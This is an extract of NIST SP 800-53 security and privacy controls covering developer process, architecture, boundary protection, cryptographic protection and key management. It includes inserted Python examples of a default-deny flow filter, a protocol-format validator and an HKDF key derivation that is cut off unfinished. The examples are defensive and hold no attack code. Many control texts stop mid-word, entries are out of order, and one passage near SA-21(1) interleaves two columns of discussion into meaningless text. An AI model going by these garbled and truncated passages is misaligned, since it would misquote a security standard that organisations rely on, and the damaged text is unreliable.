Discussion: Automated tools can be more effective at analyzing exploitable weaknesses or deficiencies in large an
Related Controls: RA-5, SA-11.

SA-15(8) Development Process, Standards, and Tools | Reuse of Threat and Vulnerability Information
Control Text: Require the developer of the system, system component, or system service to use threat modeling and vulnerability analyses from similar systems, components, or services to inform the current development process.
Discussion: Analysis of vulnerabilities found in similar software applications can inform potential design and implementation issues for systems under development. Similar systems or system components may exist within developer organizations. Vulnerability information is available from a variety of public and private sector sources, including the NIST National Vulnerability Database.
Related Controls: None.

SA-19(4) Component Authenticity | Anti-counterfeit Scanning [Withdrawn: Moved to SR-11(3).]

SA-15(10) Development Process, Standards, and Tools | Incident Response Plan
Control Text: Require the developer of the system, system component, or system service to provide, implement, and
Discussion: The incident response plan provided by developers may provide information not readily available to o
Related Controls: IR-8.

SA-15(11) Development Process, Standards, and Tools | Archive System or Component
Control Text: Require the developer of the system or system component to archive the system or component to be
Discussion: Archiving system or system components requires the developer to retain key development artifacts,
Related Controls: CM-2.

SA-15(12) Development Process, Standards, and Tools | Minimize Personally Identifiable Information
Control Text: Require the developer of the system or system component to minimize the use of personally identifi
Discussion: Organizations can minimize the risk to an individual’s privacy by using techniques such as de-identifi
Related Controls: PM-25, SA-3, SA-8.

SA-16 Developer-provided Training
Control Text: Require the developer of the system, system component, or system service to provide the following t
Discussion: Developer-provided training applies to external and internal (in-house) developers. Training personne
Related Controls: AT-2, AT-3, PE-3, SA-4, SA-5.

SA-17 Developer Security and Privacy Architecture and Design
Control Text: Require the developer of the system, system component, or system service to produce a design specification and security and privacy architecture that:
Discussion: Developer security and privacy architecture and design are directed at external developers, although
Related Controls: PL-2, PL-8, PM-7, SA-3, SA-4, SA-8, SC-7.

SA-17(1) Developer Security and Privacy Architecture and Design | Formal Policy Model
Control Text: Require the developer of the system, system component, or system service to: (a) Produce, as an integral part of the system development process, a formal policy model describing the [Assignment: organization-defined elements of organizational security and privacy policy] to be enforced; and
Discussion: Formal models describe specific behaviors or security and privacy policies using formal languages, th
Related Controls: AC-3, AC-4, AC-25.

SA-17(2) Developer Security and Privacy Architecture and Design | Security-relevant Components
Control Text: Require the developer of the system, system component, or system service to: (a) Define security-relevant hardware, software, and firmware; and
Discussion: The security-relevant hardware, software, and firmware represent the portion of the system, component
Related Controls: AC-25, SA-5.

SA-17(3) Developer Security and Privacy Architecture and Design | Formal Correspondence
Control Text: Require the developer of the system, system component, or system service to: (a) Produce, as an integral part of the system development process, a formal top-level specification that specifies the interfaces to security-relevant hardware, software, and firmware in terms of exceptions, error messages, and effects;
Discussion: Correspondence is an important part of the assurance gained through modeling. It demonstrates that
Related Controls: AC-3, AC-4, AC-25, SA-4, SA-5.

SA-17(4) Developer Security and Privacy Architecture and Design | Informal Correspondence
Control Text: Require the developer of the system, system component, or system service to: (a) Produce, as an integral part of the system development process, an informal descriptive top-level specification that specifies the interfaces to security-relevant hardware, software, and firmware in terms of exceptions, error messages, and effects;
Discussion: Correspondence is an important part of the assurance gained through modeling. It demonstrates that
Related Controls: AC-3, AC-4, AC-25, SA-4, SA-5.

SA-17(5) Developer Security and Privacy Architecture and Design | Conceptually Simple Design
Control Text: Require the developer of the system, system component, or system service to: (a) Design and structure the security-relevant hardware, software, and firmware to use a complete, conceptually simple protection mechanism with precisely defined semantics; and
Discussion: The principle of reduced complexity states that the system design is as simple and small as possible (
Related Controls: AC-25, SA-8, SC-3.

SA-17(6) Developer Security and Privacy Architecture and Design | Structure for Testing
Control Text: Require the developer of the system, system component, or system service to structure security-relev
Discussion: Applying the security design principles in SP 800-160-1 promotes complete, consistent, and comprehe
Related Controls: SA-5, SA-11.

SA-17(7) Developer Security and Privacy Architecture and Design | Structure for Least Privilege
Control Text: Require the developer of the system, system component, or system service to structure security-releva
Discussion: The principle of least privilege states that each component is allocated sufficient privileges to accomplish its specified functions but no more (see SA-8(14)). Applying the principle of least privilege limits the scope of the component’s actions, which has two desirable effects. First, the security impact of a failure, corruption, or misuse of the system component results in minimized
Related Controls: AC-5, AC-6, SA-8.

SA-17(8) Developer Security and Privacy Architecture and Design | Orchestration
Control Text: Design [Assignment: organization-defined critical systems or system components] with coordinated behavior to implement the following capabilities: [Assignment: organization-defined capabilities, by system or component].
Discussion: Security resources that are distributed, located at different layers or in different system elements, or are implemented to support different aspects of trustworthiness can interact in unforeseen or incorrect ways. Adverse
Related Controls: None.

SA-17(9) Developer Security and Privacy Architecture and Design | Design Diversity
Control Text: Use different designs for [Assignment: organization-defined critical systems or system components] to satisfy a common set of requirements or to provide equivalent functionality.
Discussion: Design diversity is achieved by supplying the same requirements specification to multiple developers, each
Related Controls: None.

SA-21(1) Developer Screening | Validation of Screening [Withdrawn: Incorporated into SA-21.]
of whom consequences
is responsible forinclude
developing failures,
a variant of the interference,
system or system
gaps. Coordination
component that meets of thethebehavior
requirements.of security resources
Variants can be(e.g., by ensuring
in software design, thatinone patch isdesign, or
hardware
SA-22(1) Unsupported System Components | Alternative Sources for Continued Support [Withdrawn: Incorporated into SA-22.] in both hardware and a software design. Differences in the designs of the variants can result from


SA-4(4) Acquisition Process | Assignment of Components to Systems [Withdrawn: Incorporated into CM-8(9).]
SA-5(1) System Documentation | Functional Properties of Security Controls [Withdrawn: Incorporated into SA-4(1).]
SA-5(2) System Documentation | Security-relevant External System Interfaces [Withdrawn: Incorporated into SA-4(2).]
SA-5(3) System Documentation | High-level Design [Withdrawn: Incorporated into SA-4(2).]
SA-5(4) System Documentation | Low-level Design [Withdrawn: Incorporated into SA-4(2).]
SA-5(5) System Documentation | Source Code [Withdrawn: Incorporated into SA-4(2).]
SA-20 Customized Development of Critical Components Reimplement or custom develop the following critical system components: [Assignment: organization Organizations determine that certain system components likely cannot be trusted due to specific threats to and vulnerabilities in those components for which there are no viable security controls to adequate CP-2, RA-9, SA-8.
SA-21 Developer Screening Require that the developer of [Assignment: organization-defined system, system component, or system service]: Developer screening is directed at external developers. Internal developer screening is addressed by PS-2, PS-3, PS-6, PS-7, SA-4, SR-6.
SA-6 Software Usage Restrictions [Withdrawn: Incorporated into CM-10 and SI-7.]
SA-22 Unsupported System Components a. Replace system components when support for the components is no longer available from the developer, vendor, or manufacturer; or Support for system components includes software patches, firmware updates, replacement parts, and maintenance contracts. An example of unsupported components includes when vendors no longer provide critical software patches or product updates, which can result in an opportunity for adversaries to exploit weaknesses in the installed components. Exceptions to replacing PL-2, SA-3.
SA-7 User-installed Software [Withdrawn: Incorporated into CM-11 and SI-7.]
SA-23 Specialization Employ [Selection (one or more): design; modification; augmentation; reconfiguration] on [Assignme It is often necessary for a system or system component that supports mission-essential services or f RA-9, SA-8.
SC-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: 1. [Selection (one or more): Organization-level; Mission/business process-level; System-level] system and communications protection policy that: System and communications protection policy and procedures address the controls in the SC family that PM-9, PS-8, SA-8, SI-12.
SC-2 Separation of System and User Functionality Separate user functionality, including user interface services, from system management functionality System management functionality includes functions that are necessary to administer databases, netwo AC-6, SA-4, SA-8, SC-3, SC-7, SC-22, SC-32, SC-39.
SC-2(1) Separation of System and User Functionality | Interfaces for Non-privileged Users Prevent the presentation of system management functionality at interfaces to non-privileged users. Preventing the presentation of system management functionality at interfaces to non-privileged users e AC-3.
SC-2(2) Separation of System and User Functionality | Disassociability Store state information from applications and software separately. If a system is compromised, storing applications and software separately from state information about users’ interactions with an application may better protect individuals’ privacy. None.
SC-3 Security Function Isolation Isolate security functions from nonsecurity functions. Security functions are isolated from nonsecurity functions by means of an isolation boundary implemen AC-3, AC-6, AC-25, CM-2, CM-4, SA-4, SA-5, SA-8, SA-15, SA-17, SC-2, SC-7, SC-32, SC-39, SI-16.
SC-3(1) Security Function Isolation | Hardware Separation Employ hardware separation mechanisms to implement security function isolation. Hardware separation mechanisms include hardware ring architectures that are implemented within microprocessors and hardware-enforced address segmentation used to support logically distinct storage objects with separate attributes (i.e., readable, writeable). None.
SC-3(2) Security Function Isolation | Access and Flow Control Functions Isolate security functions enforcing access and information flow control from nonsecurity functions and from other security functions. Security function isolation occurs because of implementation. The functions can still be scanned and monitored. Security functions that are potentially isolated from access and flow control enforcement functions include auditing, intrusion detection, and malicious code protection functions. None.
SC-3(3) Security Function Isolation | Minimize Nonsecurity Functionality Minimize the number of nonsecurity functions included within the isolation boundary containing security functions. Where it is not feasible to achieve strict isolation of nonsecurity functions from security functions, it is necessary to take actions to minimize nonsecurity-relevant functions within the security function boundary. Nonsecurity functions contained within the isolation boundary are considered security-relevant because errors or malicious code in the software can directly impact the security functions None.
SC-3(4) Security Function Isolation | Module Coupling and Cohesiveness Implement security functions as largely independent modules that maximize internal cohesiveness within modules and minimize coupling between modules. The reduction of inter-module interactions helps to constrain security functions and manage complexity. The concepts of coupling and cohesion are important with respect to modularity in software design. Coupling refers to the dependencies that one module has on other modules. Cohesion refers to the relationship between functions within a module. Best practices in software None.
SC-3(5) Security Function Isolation | Layered Structures Implement security functions as a layered structure minimizing interactions between layers of the design and avoiding any dependence by lower layers on the functionality or correctness of higher layers. The implementation of layered structures with minimized interactions among security functions and non-looping layers (i.e., lower-layer functions do not depend on higher-layer functions) enables the isolation of security functions and the management of complexity. None.
SC-4 Information in Shared System Resources Prevent unauthorized and unintended information transfer via shared system resources. Preventing unauthorized and unintended information transfer via shared system resources stops informa AC-3, AC-4, SA-8.
SC-12(4) Cryptographic Key Establishment and Management | PKI Certificates [Withdrawn: Incorporated into SC-12(3).]
SC-4(2) Information in Shared System Resources | Multilevel or Periods Processing Prevent unauthorized information transfer via shared resources in accordance with [Assignment: organization-defined procedures] when system processing explicitly switches between different information classification levels or security categories. Changes in processing levels can occur during multilevel or periods processing with information at different classification levels or security categories. It can also occur during serial reuse of hardware components at different classification levels. Organization-defined procedures can include approved sanitization processes for electronically stored information. None.
SC-5 Denial-of-service Protection a. [Selection: Protect against; Limit] the effects of the following types of denial-of-service events: [Assignment: organization-defined types of denial-of-service events]; and Denial-of-service events may occur due to a variety of internal and external causes, such as an attack CP-2, IR-4, SC-6, SC-7, SC-40.
SC-5(1) Denial-of-service Protection | Restrict Ability to Attack Other Systems Restrict the ability of individuals to launch the following denial-of-service attacks against other systems: [Assignment: organization-defined denial-of-service attacks]. Restricting the ability of individuals to launch denial-of-service attacks requires the mechanisms commonly used for such attacks to be unavailable. Individuals of concern include hostile insiders or external adversaries who have breached or compromised the system and are using it to launch a denial-of-service attack. Organizations can restrict the ability of individuals to connect and transmit None.
SC-5(2) Denial-of-service Protection | Capacity, Bandwidth, and Redundancy Manage capacity, bandwidth, or other redundancy to limit the effects of information flooding denial-of-service attacks. Managing capacity ensures that sufficient capacity is available to counter flooding attacks. Managing capacity includes establishing selected usage priorities, quotas, partitioning, or load balancing. None.
SC-5(3) Denial-of-service Protection | Detection and Monitoring (a) Employ the following monitoring tools to detect indicators of denial-of-service attacks against, or launched from, the system: [Assignment: organization-defined monitoring tools]; and Organizations consider utilization and capacity of system resources when managing risk associated CA-7, SI-4.
SC-6 Resource Availability Protect the availability of resources by allocating [Assignment: organization-defined resources] by [S Priority protection prevents lower-priority processes from delaying or interfering with the system t SC-5.
SC-7 Boundary Protection a. Monitor and control communications at the external managed interfaces to the system and at key internal managed interfaces within the system; Managed interfaces include gateways, routers, firewalls, guards, network-based malicious code analys AC-4, AC-17, AC-18, AC-19, AC-20, AU-13, CA-3, CM-2, CM-4, CM-7, CM-10, CP-8, CP-10, IR-4, MA-4, PE-3, PL-8, PM-12, SA-8, SA-17, SC-5, SC-26, SC-32, SC-35, SC-43.
SC-12(5) Cryptographic Key Establishment and Management | PKI Certificates / Hardware Tokens [Withdrawn: Incorporated into SC-12(3).]
SC-13(1) Cryptographic Protection | FIPS-validated Cryptography [Withdrawn: Incorporated into SC-13.]
SC-7(3) Boundary Protection | Access Points Limit the number of external network connections to the system. Limiting the number of external network connections facilitates monitoring of inbound and outbound communications traffic. The Trusted Internet Connection DHS TIC initiative is an example of a federal guideline that requires limits on the number of external network connections. Limiting the number of external network connections to the system is important during transition periods None.
SC-7(4) Boundary Protection | External Telecommunications Services (a) Implement a managed interface for each external telecommunication service; (b) Establish a traffic flow policy for each managed interface; External telecommunications services can provide data and/or voice communications services. Examp AC-3, SC-8, SC-20, SC-21, SC-22.
SC-7(5) Boundary Protection | Deny by Default — Allow by Exception Deny network communications traffic by default and allow network communications traffic by exception [Selection (one or more): at managed interfaces; for [Assignment: organization-defined systems]]. Denying by default and allowing by exception applies to inbound and outbound network communications traffic. A deny-all, permit-by-exception network communications traffic policy ensures that only those system connections that are essential and approved are allowed. Deny by default, allow by exception also applies to a system that is connected to an external system. None.
SC-13(2) Cryptographic Protection | NSA-approved Cryptography [Withdrawn: Incorporated into SC-13.]
SC-7(7) Boundary Protection | Split Tunneling for Remote Devices Prevent split tunneling for remote devices connecting to organizational systems unless the split tunnel is securely provisioned using [Assignment: organization-defined safeguards]. Split tunneling is the process of allowing a remote user or device to establish a non-remote connection with a system and simultaneously communicate via some other connection to a resource in an external network. This method of network access enables a user to access remote devices and simultaneously, access uncontrolled networks. Split tunneling might be desirable by None.
SC-7(8) Boundary Protection | Route Traffic to Authenticated Proxy Servers Route [Assignment: organization-defined internal communications traffic] to [Assignment: organizat External networks are networks outside of organizational control. A proxy server is a server (i.e., s AC-3.
SC-7(9) Boundary Protection | Restrict Threatening Outgoing Communications Traffic (a) Detect and deny outgoing communications traffic posing a threat to external systems; and (b) Audit the identity of internal users associated with denied communications. Detecting outgoing communications traffic from internal actions that may pose threats to external syst AU-2, AU-6, SC-5, SC-38, SC-44, SI-3, SI-4.
SC-7(10) Boundary Protection | Prevent Exfiltration (a) Prevent the exfiltration of information; and (b) Conduct exfiltration tests [Assignment: organization-defined frequency]. Prevention of exfiltration applies to both the intentional and unintentional exfiltration of informa AC-2, CA-8, SI-3.
SC-7(11) Boundary Protection | Restrict Incoming Communications Traffic Only allow incoming communications from [Assignment: organization-defined authorized sources] to [Assignment: organization-defined General source address validation techniques are applied to restrict the use of illegal and unallocat AC-3.
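An added illustration of the deny-by-default, allow-by-exception policy that SC-7(5) requires, written for this catalog and not taken from SP 800-53: a small Python policy evaluator in which the approved exception list is the only path to an allow decision and every other flow, inbound or outbound, falls through to deny. The rule set and the flow records are constructed sample data; the networks, ports and approval reasons are assumptions, not values from the standard.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class AllowRule:
    """One approved exception to the default deny (constructed for this example)."""
    direction: str                    # "inbound" or "outbound" relative to the protected system
    protocol: str                     # "tcp" or "udp"
    remote: ipaddress.IPv4Network     # remote address range the exception covers
    port: int                         # local service port (inbound) or remote port (outbound)
    reason: str                       # the approval record that justifies the exception


# Constructed exception list: these are the ONLY flows that will be allowed.
# Everything not listed here is denied without needing a rule of its own.
EXCEPTIONS = (
    AllowRule("inbound",  "tcp", ipaddress.ip_network("0.0.0.0/0"),    443,  "public HTTPS front end"),
    AllowRule("inbound",  "tcp", ipaddress.ip_network("10.0.5.0/24"),   22,  "SSH from management subnet"),
    AllowRule("outbound", "udp", ipaddress.ip_network("10.0.0.53/32"),  53,  "internal DNS resolver"),
    AllowRule("outbound", "tcp", ipaddress.ip_network("10.0.9.10/32"), 8443, "patch mirror"),
)


@dataclass(frozen=True)
class Flow:
    """A connection attempt seen at the managed interface (constructed sample)."""
    direction: str
    protocol: str
    remote_ip: str
    port: int


def evaluate(flow, rules=EXCEPTIONS):
    """Return ('allow', reason) if an approved exception matches, else ('deny', 'default').

    There is deliberately no 'deny' rule type: the absence of a matching
    exception is the deny, which is what deny-all, permit-by-exception means.
    """
    addr = ipaddress.ip_address(flow.remote_ip)
    for rule in rules:
        if (rule.direction == flow.direction
                and rule.protocol == flow.protocol
                and rule.port == flow.port
                and addr in rule.remote):
            return ("allow", rule.reason)
    return ("deny", "default")


def filter_flows(flows, rules=EXCEPTIONS):
    """Evaluate a batch of flows; the denied ones are what a monitor should review."""
    return [(flow, *evaluate(flow, rules)) for flow in flows]


if __name__ == "__main__":
    sample = [
        Flow("inbound",  "tcp", "198.51.100.7", 443),   # public web client
        Flow("inbound",  "tcp", "198.51.100.7",  22),   # SSH from the Internet: denied
        Flow("inbound",  "tcp", "10.0.5.17",     22),   # SSH from management subnet
        Flow("outbound", "udp", "10.0.0.53",     53),   # DNS to the approved resolver
        Flow("outbound", "tcp", "203.0.113.9",   25),   # unapproved outbound SMTP: denied
    ]
    for flow, decision, why in filter_flows(sample):
        print(f"{decision:5s} {flow.direction:8s} {flow.protocol} {flow.remote_ip}:{flow.port} ({why})")
```

The exception tuple is immutable on purpose: adding an allowed flow means adding a rule with its approval reason, which keeps the "essential and approved" requirement visible in the policy itself rather than in a separate document.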
SC-7(12) Boundary Protection | Host-based Protection Implement [Assignment: organization-defined host-based boundary protection mechanisms] at [Assignment: organization-defined system components]. Host-based boundary protection mechanisms include host-based firewalls. System components that employ host-based boundary protection mechanisms include servers, workstations, notebook computers, and mobile devices. None.
SC-7(13) Boundary Protection | Isolation of Security Tools, Mechanisms, and Support Components Isolate [Assignment: organization-defined information security tools, mechanisms, and support co Physically separate subnetworks with managed interfaces are useful in isolating computer network de SC-2, SC-3.
SC-7(14) Boundary Protection | Protect Against Unauthorized Physical Connections Protect against unauthorized physical connections at [Assignment: organization-defined managed int Systems that operate at different security categories or classification levels may share common physi PE-4, PE-19.
SC-7(15) Boundary Protection | Networked Privileged Accesses Route networked, privileged accesses through a dedicated, managed interface for purposes of access Privileged access provides greater accessibility to system functions, including security functions. Ad AC-2, AC-3, AU-2, SI-4.
SC-7(16) Boundary Protection | Prevent Discovery of System Components Prevent the discovery of specific system components that represent a managed interface. Preventing the discovery of system components representing a managed interface helps protect network addresses of those components from discovery through common tools and techniques used to identify devices on networks. Network addresses are not available for discovery and require prior knowledge for access. Preventing the discovery of components and devices can be None.
SC-7(17) Boundary Protection | Automated Enforcement of Protocol Formats Enforce adherence to protocol formats. System components that enforce protocol formats include deep packet inspection firewalls and XML gat SC-4.
SC-7(18) Boundary Protection | Fail Secure Prevent systems from entering unsecure states in the event of an operational failure of a boundary p Fail secure is a condition achieved by employing mechanisms to ensure that in the event of operation CP-2, CP-12, SC-24.
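An added example, not part of SP 800-53, showing SC-7(17) and SC-7(23) together at a managed interface: a strict parser that enforces the format of a simple line protocol, and a responder that gives the sender no feedback whatever the reason for rejection, while an internal audit record keeps the detail a defender needs (the kind of information SI-4 monitoring consumes). The "SET/GET" protocol, its grammar, the size limit and the sample messages are all constructed for this illustration and are not drawn from the standard.

```python
import re
from typing import Optional

# Constructed grammar for the example protocol: one ASCII line,
#   "SET <key> <value>\n"   or   "GET <key>\n"
# key: 1-16 letters/underscores; value: 1-5 decimal digits (checked <= 65535 below).
LINE_RE = re.compile(rb"\A(SET|GET) ([A-Za-z_]{1,16})(?: ([0-9]{1,5}))?\n\Z")
MAX_LINE = 64   # assumed hard limit on line length for this example


class ProtocolGate:
    """Format enforcement (SC-7(17)) with sender feedback disabled (SC-7(23))."""

    def __init__(self):
        # Internal-only record of rejections: (first bytes of the message, reason).
        # This is for the organization's monitoring, never returned to the sender.
        self.audit = []

    def parse(self, raw: bytes) -> Optional[dict]:
        """Return the parsed message, or None if it violates the protocol format."""
        if len(raw) > MAX_LINE:
            return self._reject(raw, "line exceeds %d bytes" % MAX_LINE)
        if not raw.isascii():
            return self._reject(raw, "non-ASCII byte in line")
        match = LINE_RE.match(raw)
        if match is None:
            return self._reject(raw, "line does not match grammar")
        verb, key, value = match.group(1), match.group(2), match.group(3)
        if verb == b"SET":
            if value is None or int(value) > 65535:
                return self._reject(raw, "SET requires a value in 0..65535")
        elif value is not None:
            return self._reject(raw, "GET takes no value")
        return {"verb": verb.decode(), "key": key.decode(),
                "value": None if value is None else int(value)}

    def _reject(self, raw: bytes, reason: str) -> None:
        self.audit.append((raw[:MAX_LINE], reason))
        return None

    def respond(self, raw: bytes) -> bytes:
        """Sender-facing behaviour: identical, empty response for every failure.

        Returning a specific error ("bad key", "value too large", ...) would let
        a sender map the parser; a uniform silent drop gives away nothing, and the
        reason still lands in self.audit for the defenders.
        """
        message = self.parse(raw)
        if message is None:
            return b""
        return b"OK\n"


if __name__ == "__main__":
    gate = ProtocolGate()
    for line in (b"SET retries 3\n", b"SET retries 99999\n", b"GET x y\n", b"\xff\n", b"GET retries\n"):
        print(repr(line), "->", repr(gate.respond(line)))
    for entry in gate.audit:
        print("audit:", entry)
```

Note the asymmetry the code enforces: the sender observes only "OK" or silence, but every rejected line, with its reason, is available internally for monitoring and for tuning the grammar.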
SC-7(19) Boundary Protection | Block Communication from Non-organizationally Configured Hosts Block inbound and outbound communications traffic between [Assignment: organization-defined communication clients] that are independently configured by end users and external service providers. Communication clients independently configured by end users and external service providers include instant messaging clients and video conferencing software and applications. Traffic blocking does not apply to communication clients that are configured by organizations to perform authorized functions. None.
SC-7(20) Boundary Protection | Dynamic Isolation and Segregation Provide the capability to dynamically isolate [Assignment: organization-defined system components] from other system components. The capability to dynamically isolate certain internal system components is useful when it is necessary to partition or separate system components of questionable origin from components that possess greater trustworthiness. Component isolation reduces the attack surface of organizational systems. Isolating selected system components can also limit the damage from successful attacks None.
SC-7(21) Boundary Protection | Isolation of System Components Employ boundary protection mechanisms to isolate [Assignment: organization-defined system compon Organizations can isolate system components that perform different mission business functions. CA-9.
SC-7(22) Boundary Protection | Separate Subnets for Connecting to Different Security Domains Implement separate network addresses to connect to systems in different security domains. The decomposition of systems into subnetworks (i.e., subnets) helps to provide the appropriate level of protection for network connections to different security domains that contain information with different security categories or classification levels. None.
SC-7(23) Boundary Protection | Disable Sender Feedback on Protocol Validation Failure Disable feedback to senders on protocol format validation failure. Disabling feedback to senders when there is a failure in protocol validation format prevents adversaries from obtaining information that would otherwise be unavailable. None.
SC-7(24) Boundary Protection | Personally Identifiable Information For systems that process personally identifiable information: (a) Apply the following processing rules to data elements of personally identifiable information: [Assignment: organization-defined processing rules]; Managing the processing of personally identifiable information is an important aspect of protecting a PT-2, SI-15.
SC-7(25) Boundary Protection | Unclassified National Security System Connections Prohibit the direct connection of [Assignment: organization-defined unclassified national security system] to an external network without the use of [Assignment: organization-defined boundary protection device]. A direct connection is a dedicated physical or virtual connection between two or more systems. Organizations typically do not have complete control over external networks, including the Internet. Boundary protection devices (e.g., firewalls, gateways, and routers) mediate communications and information flows between unclassified national security systems and external networks. None.
SC-7(26) Boundary Protection | Classified National Security System Connections Prohibit the direct connection of a classified national security system to an external network without the use of [Assignment: organization-defined boundary protection device]. A direct connection is a dedicated physical or virtual connection between two or more systems. Organizations typically do not have complete control over external networks, including the Internet. Boundary protection devices (e.g., firewalls, gateways, and routers) mediate communications and information flows between classified national security systems and external networks. In addition, None.
SC-7(27) Boundary Protection | Unclassified Non-national Security System Connections Prohibit the direct connection of [Assignment: organization-defined unclassified non-national security system] to an external network without the use of [Assignment: organization-defined boundary protection device]. A direct connection is a dedicated physical or virtual connection between two or more systems. Organizations typically do not have complete control over external networks, including the Internet. Boundary protection devices (e.g., firewalls, gateways, and routers) mediate communications and information flows between unclassified non-national security systems and external networks. None.
SC-7(28) Boundary Protection | Connections to Public Networks Prohibit the direct connection of [Assignment: organization-defined system] to a public network. A direct connection is a dedicated physical or virtual connection between two or more systems. A public network is a network accessible to the public, including the Internet and organizational extranets with public access. None.
SC-7(29) Boundary Protection | Separate Subnets to Isolate Functions Implement [Selection: physically; logically] separate subnetworks to isolate the following critical system components and functions: [Assignment: organization-defined critical system components and functions]. Separating critical system components and functions from other noncritical system components and functions through separate subnetworks may be necessary to reduce susceptibility to a catastrophic or debilitating breach or compromise that results in system failure. For example, physically separating the command and control function from the in-flight entertainment function None.
SC-8 Transmission Confidentiality and Integrity Protect the [Selection (one or more): confidentiality; integrity] of transmitted information. Protecting the confidentiality and integrity of transmitted information applies to internal and external networks as well as any system components that can transmit information, including servers, notebook computers, desktop computers, mobile devices, printers, copiers, scanners, facsimile machines, and radios. Unprotected communication paths are exposed to the possibility of AC-17, AC-18, AU-10, IA-3, IA-8, IA-9, MA-4, PE-4, SA-4, SA-8, SC-7, SC-16, SC-20, SC-23, SC-28.
SC-8(1) Transmission Confidentiality and Integrity | Cryptographic Protection Implement cryptographic mechanisms to [Selection (one or more): prevent unauthorized disclosure of Encryption protects information from unauthorized disclosure and modification during transmission. SC-12, SC-13.
SC-8(2) Transmission Confidentiality and Integrity | Pre- and Post-transmission Handling Maintain the [Selection (one or more): confidentiality; integrity] of information during preparation for transmission and during reception. Information can be unintentionally or maliciously disclosed or modified during preparation for transmission or during reception, including during aggregation, at protocol transformation points, and during packing and unpacking. Such unauthorized disclosures or modifications compromise the confidentiality or integrity of the information. None.
SC-8(3) Transmission Confidentiality and Integrity | Cryptographic Protection for Message Externals Implement cryptographic mechanisms to protect message externals unless otherwise protected by [Ass Cryptographic protection for message externals addresses protection from the unauthorized disclosure SC-12, SC-13.
SC-8(4) Transmission Confidentiality and Integrity | Conceal or Randomize Communications Implement cryptographic mechanisms to conceal or randomize communication patterns unless otherwis Concealing or randomizing communication patterns addresses protection from unauthorized disclosure o SC-12, SC-13.
SC-8(5) Transmission Confidentiality and Integrity | Protected Distribution System Implement [Assignment: organization-defined protected distribution system] to [Selection (one or more): prevent unauthorized disclosure of information; detect changes to information] during transmission. The purpose of a protected distribution system is to deter, detect, and/or make difficult physical access to the communication lines that carry national security information. None.
SC-13(3) Cryptographic Protection | Individuals Without Formal Access Approvals [Withdrawn: Incorporated into SC-13.]
SC-10 Network Disconnect Terminate the network connection associated with a communications session at the end of the session Network disconnect applies to internal and external networks. Terminating network connections associa AC-17, SC-23.
SC-11 Trusted Path a. Provide a [Selection: physically; logically] isolated trusted communications path for communications between the user and the trusted components of the system; and Trusted paths are mechanisms by which users can communicate (using input devices such as keyboards) AC-16, AC-25, SC-12, SC-23.
SC-11(1) Trusted Path | Irrefutable Communications Path (a) Provide a trusted communications path that is irrefutably distinguishable from other communications paths; and An irrefutable communications path permits the system to initiate a trusted path, which necessitates that the user can unmistakably recognize the source of the communication as a trusted system component. For example, the trusted path may appear in an area of the display that other applications cannot access or be based on the presence of an identifier that cannot be spoofed. None.
SC-12 Cryptographic Key Establishment and Management Establish and manage cryptographic keys when cryptography is employed within the system in accorda Cryptographic key management and establishment can be performed using manual procedures or automate AC-17, AU-9, AU-10, CM-3, IA-3, IA-7, SA-4, SA-8, SA-9, SC-8, SC-11, SC-12, SC-13, SC-17, SC-20, SC-37, SC-40, SI-3, SI-7.
SC-12(1) Cryptographic Key Establishment and Management | Availability Maintain availability of information in the event of the loss of cryptographic keys by users. Escrowing of encryption keys is a common practice for ensuring availability in the event of key loss. A forgotten passphrase is an example of losing a cryptographic key. None.
SC-12(2) Cryptographic Key Establishment and Management | Symmetric Keys Produce, control, and distribute symmetric cryptographic keys using [Selection: NIST FIPS-validated; NSA-approved] key management technology and processes. SP 800-56A, SP 800-56B, and SP 800-56C provide guidance on cryptographic key establishment schemes and key derivation methods. SP 800-57-1, SP 800-57-2, and SP 800-57-3 provide guidance on cryptographic key management. None.
SC-12(3) Cryptographic Key Establishment and Management | Asymmetric Keys Produce, control, and distribute asymmetric cryptographic keys using [Selection: NSA-approved key management technology and processes; prepositioned keying material; DoD-approved or DoD-issued Medium Assurance PKI certificates; DoD-approved or DoD-issued Medium Hardware Assurance PKI certificates and hardware security tokens that protect the user’s private key; SP 800-56A, SP 800-56B, and SP 800-56C provide guidance on cryptographic key establishment schemes and key derivation methods. SP 800-57-1, SP 800-57-2, and SP 800-57-3 provide guidance on cryptographic key management. None.
SC-13(4) Cryptographic Protection | Digital Signatures [Withdrawn: Incorporated into SC-13.]
SC-14 Public Access Protections [Withdrawn: Incorporated into AC-2, AC-3, AC-5, AC-6, SI-3, SI-4, SI-5, SI-7, and SI-10.]
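SC-12(2) points to SP 800-56C for key-derivation methods. As an added example for this catalog, not code from SP 800-53 or from NIST, the block below implements the extract-then-expand two-step key derivation that SP 800-56C describes, in the HKDF form of RFC 5869, using only the Python standard library, and shows how one shared secret is turned into separate, context-bound encryption and MAC keys. The label strings, the sample secret and the context value are assumptions constructed for the illustration; RFC 5869 test case 1 is used to check that the primitive is implemented correctly.

```python
import hashlib
import hmac

# Added example: HKDF (RFC 5869), the extract-then-expand form of the two-step
# key derivation in SP 800-56C. Standard library only. Labels, sample secret and
# context below are assumptions constructed for this illustration.

HASH = "sha256"
DIGEST_LEN = hashlib.new(HASH).digest_size


def hkdf_extract(salt: bytes, ikm: bytes) -> bytes:
    """Step 1 (randomness extraction): condense the shared secret into a PRK."""
    if not salt:                           # RFC 5869: missing salt = HashLen zero bytes
        salt = b"\x00" * DIGEST_LEN
    return hmac.new(salt, ikm, HASH).digest()


def hkdf_expand(prk: bytes, info: bytes, length: int) -> bytes:
    """Step 2 (key expansion): derive 'length' bytes bound to the context 'info'."""
    if length > 255 * DIGEST_LEN:
        raise ValueError("requested key material too long for HKDF")
    okm, block, counter = b"", b"", 1
    while len(okm) < length:
        block = hmac.new(prk, block + info + bytes([counter]), HASH).digest()
        okm += block
        counter += 1
    return okm[:length]


def derive_session_keys(shared_secret: bytes, salt: bytes, context: bytes) -> dict:
    """Derive distinct encryption and MAC keys from one established secret.

    'context' binds the keys to the parties and purpose (identities, protocol
    version, ...), so the same secret never yields the same keys for a different
    use. Distinct labels keep the two keys cryptographically separate.
    """
    prk = hkdf_extract(salt, shared_secret)
    return {
        "enc": hkdf_expand(prk, b"example-enc-key|" + context, 32),   # label is an assumption
        "mac": hkdf_expand(prk, b"example-mac-key|" + context, 32),   # label is an assumption
    }


def check_rfc5869_vector() -> bool:
    """Self-check against RFC 5869 test case 1 (HMAC-SHA-256)."""
    ikm = bytes([0x0B] * 22)
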